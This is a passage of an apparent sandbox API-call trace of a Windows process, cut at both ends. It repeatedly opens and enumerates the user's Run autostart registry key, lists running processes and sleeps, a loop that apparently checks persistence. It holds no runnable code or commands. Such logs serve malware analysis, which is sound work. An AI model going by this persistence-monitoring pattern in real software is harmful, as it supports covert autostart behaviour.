Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.781] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.781] NtClose (Handle=0x274) returned 0x0 [0174.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.789] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.793] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.795] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.795] NtClose (Handle=0x274) returned 0x0 [0174.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.808] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.808] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.811] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.812] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.812] NtClose (Handle=0x274) returned 0x0 [0174.812] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.821] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.828] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.829] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.829] NtClose (Handle=0x274) returned 0x0 [0174.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.852] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.855] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.857] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.857] NtClose (Handle=0x274) returned 0x0 [0174.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.860] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.868] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.872] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.874] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.874] NtClose (Handle=0x274) returned 0x0 [0174.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.912] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.917] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.919] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.919] NtClose (Handle=0x274) returned 0x0 [0174.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.934] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.935] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.935] NtClose (Handle=0x274) returned 0x0 [0174.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.950] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.955] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.957] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.957] NtClose (Handle=0x274) returned 0x0 [0174.957] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.969] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.970] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.973] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.974] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.975] NtClose (Handle=0x274) returned 0x0 [0174.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0174.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0174.984] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0174.991] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0174.993] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0174.993] NtClose (Handle=0x274) returned 0x0 [0174.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0174.993] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0174.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0174.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0174.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.008] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.012] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.013] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.013] NtClose (Handle=0x274) returned 0x0 [0175.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.023] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.025] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.026] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.026] NtClose (Handle=0x274) returned 0x0 [0175.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0175.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0175.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0175.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0175.038] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0175.041] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0175.043] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0175.043] NtClose (Handle=0x274) returned 0x0 [0175.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0175.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0175.045] NtFreeVirtualMemory 